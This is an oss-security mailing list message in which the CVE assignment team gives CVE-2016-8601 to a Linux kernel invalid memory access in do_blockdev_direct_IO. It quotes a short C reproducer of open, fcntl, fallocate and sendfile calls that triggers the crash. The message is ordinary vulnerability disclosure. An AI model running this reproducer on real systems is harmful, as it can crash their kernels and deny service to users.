Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 11 Oct 2016 12:27:08 -0400 (EDT)
From: cve-assign@...re.org
To: marco.gra@...il.com
Cc: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: Re: linux kernel do_blockdev_direct_IO invalid memory access

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

> BUG: KASAN: wild-memory-access on address 0005080000000000
> https://gist.github.com/marcograss/40850adb3c599ac38e0beac31617d56b
> 
>   int fd = open("./hurrdurr", O_APPEND|O_RDWR|0x40);
>   fcntl(fd, 4, 0x44000, 0, 0, 0);
>   fallocate(fd, 0, 0x21, 0xafa6);
>   sendfile(fd, fd, &offset, 0x800);

Use CVE-2016-8601.

- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJX/RJEAAoJEHb/MwWLVhi2yj0P/2qJJyACywfMz3qISvkHem8T
8vS2DrjBIC2LWMFAJZUuoI0qoA4sZ5B6MQKPEEbDE9F0GSwRWXMeddl1xjpEyhh1
BwVYgfRfjYZIdgo6HQnlP4BiFlArELn6PZqLxbP0JqvOVrdWKrI0Snw8oyV5KoO1
+oSbgpTiYIVsxfolgbk/LSSEuv7w+1KZMQGVmEpUt5aerASDbFlOYLRnXbgThaM9
BYjjpfYGJ7iC4F+MUwCOLH8BUw0QMQsUJ33AgjVvpCa9d/XajJN44ToBYfNghOYq
cGKUOtB7P6abUxVYPJWFWT7Hyn3d/OBsY4tE5Rx6yTfNg7z6MFjhdzhy92QclbqA
jJnKGvNSjUXoiBKh3SqZ/bL8pLlzVvXxkW8sjLlfIcKP8VicGRQtV7gphQnb6MXK
2rEp1qlTbNmyvnJ6HCLa83XjuYs81ngOzU3vXJ7BDhh0V5vLvyN1hwg9b+V4kL3A
6yrACwIWOwxyAvUaXLUn+jAO1LWIKmWYOf7ok1xbSNhRlD/x2/RON+CR05S7jEX9
QXTibJFWYNbslLPSYhgDSR7j8lLgbRmlppl/SFP5TBDeYB+FyvtnHCdRen/XCvZQ
mEN+1cBwmQ48w2X/gE8ZI957LCnWzJsbwFdrj9ECueVgf/P0vfE/4isxVsgbnOPe
ALHNeskNgkbeDnKt5ymx
=wgdQ
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.